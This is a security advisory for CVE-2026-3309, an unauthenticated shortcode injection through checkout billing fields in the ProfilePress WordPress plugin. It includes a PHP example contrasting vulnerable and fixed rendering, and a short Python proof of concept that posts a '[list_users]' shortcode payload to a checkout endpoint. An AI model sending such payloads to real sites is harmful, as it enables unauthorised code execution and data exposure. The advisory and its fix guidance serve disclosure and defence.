Security Vulnerability Report
CVE-2026-3309 CVSS 6.5 MEDIUM

CVE-2026-3309

Published: 2026-04-04 12:16:03
Last Modified: 2026-04-24 18:13:29

Description

The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.11. This is due to the plugin allowing user-supplied billing field values from the checkout process to be interpolated into shortcode template strings that are subsequently processed without proper sanitization of shortcode syntax. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes by submitting crafted billing field values during the checkout process.
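The pattern the description names is interpolation of an untrusted value into a template before the template goes through the shortcode parser. The script below is an added illustration, not ProfilePress code: the placeholder name, the template, the attacker value, the `list_users` shortcode and the renderer functions are all hypothetical. Outside WordPress it defines minimal stand-ins for `add_shortcode()` and `do_shortcode()` so it runs on its own; inside WordPress the real functions are used.

```php
<?php
// Added example (not ProfilePress code): why interpolating raw user input into a
// shortcode template lets the input's "[...]" syntax execute, and two ways to fix it.
// Stand-ins for add_shortcode()/do_shortcode() are only defined when WordPress is
// not loaded, so the script runs stand-alone with the PHP CLI.

if (!function_exists('add_shortcode')) {
    $GLOBALS['shortcode_tags'] = [];
    function add_shortcode(string $tag, callable $cb): void {
        $GLOBALS['shortcode_tags'][$tag] = $cb;
    }
    // Minimal parser: handles attribute-less [tag] only, unlike the real one.
    function do_shortcode(string $content): string {
        return preg_replace_callback('/\[([a-z_]+)\]/', function ($m) {
            $cb = $GLOBALS['shortcode_tags'][$m[1]] ?? null;
            return $cb ? (string) $cb([], '', $m[1]) : $m[0];
        }, $content);
    }
}

// Hypothetical privileged shortcode standing in for whatever the site registers.
add_shortcode('list_users', function () {
    return 'admin, editor, shop_manager';
});

// Constructed template and constructed attacker-controlled billing value.
$template = 'Thank you for your order, {{billing_first_name}}!';
$billing_first_name = '[list_users]';

// VULNERABLE: merge the user value first, then run the shortcode parser over
// the merged string, so the user's [list_users] is executed.
function render_vulnerable(string $template, string $value): string {
    $merged = str_replace('{{billing_first_name}}', $value, $template);
    return do_shortcode($merged);
}

// FIX 1: run shortcodes on the template alone, then merge the user value, so
// the shortcode parser never sees user input.
function render_fixed_order(string $template, string $value): string {
    $rendered = do_shortcode($template);
    return str_replace('{{billing_first_name}}', $value, $rendered);
}

// FIX 2: neutralize the shortcode delimiters in the user value before merging
// (the HTML entities for "[" and "]" are left alone by the shortcode parser).
function neutralize_shortcode_syntax(string $value): string {
    return str_replace(['[', ']'], ['&#91;', '&#93;'], $value);
}
function render_fixed_escape(string $template, string $value): string {
    $merged = str_replace('{{billing_first_name}}', neutralize_shortcode_syntax($value), $template);
    return do_shortcode($merged);
}

echo "vulnerable:   ", render_vulnerable($template, $billing_first_name), "\n";
echo "fixed order:  ", render_fixed_order($template, $billing_first_name), "\n";
echo "fixed escape: ", render_fixed_escape($template, $billing_first_name), "\n";
```

The vulnerable renderer prints the shortcode's output in place of the customer name; both fixed renderers leave the attacker value inert. Fix 1 alone is fragile: if the merged string is later passed through `do_shortcode()` again (for example by a notification filter), the user value is parsed after all. Neutralizing the delimiters in the value (Fix 2) survives later processing, so it is the safer default for any field that can end up in a template.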

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record. The affected range below is taken from the description:

ProfilePress (plugin slug wp-user-avatar) <= 4.16.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-3309: Arbitrary Shortcode Execution in ProfilePress
# Target: WordPress sites with ProfilePress <= 4.16.11
TARGET_URL = "http://example.com/checkout/"

# The payload injects a shortcode to list users (or any other available shortcode).
# Attackers can use other shortcodes to extract data or perform actions.
payload_data = {
    "billing_first_name": "[list_users]",
    "billing_last_name": "Attacker",
    "billing_email": "[email protected]",
    "billing_phone": "1234567890",
    "pp_checkout_submit": "1",
}

try:
    response = requests.post(TARGET_URL, data=payload_data, timeout=15)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the response or site logs for execution results (e.g., user list).")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

Note: the script only confirms that the checkout endpoint accepted the request (HTTP 200); it does not verify that the shortcode ran. Because the description says the billing values are interpolated into shortcode templates that are processed afterwards, the shortcode output may surface in a later notification or page rather than in this response. The field names and the `list_users` shortcode must match the target's checkout form and a shortcode that is actually registered on the target site; adjust them accordingly.

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3471623%40wp-user-avatar%2Ftrunk&old=3447273%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8f083e-0de2-42a5-b289-101ec53aa44c?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3309", "sourceIdentifier": "[email protected]", "published": "2026-04-04T12:16:03.237", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.11. This is due to the plugin allowing user-supplied billing field values from the checkout process to be interpolated into shortcode template strings that are subsequently processed without proper sanitization of shortcode syntax. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes by submitting crafted billing field values during the checkout process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3471623%40wp-user-avatar%2Ftrunk&old=3447273%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8f083e-0de2-42a5-b289-101ec53aa44c?source=cve", "source": "[email protected]"}]}}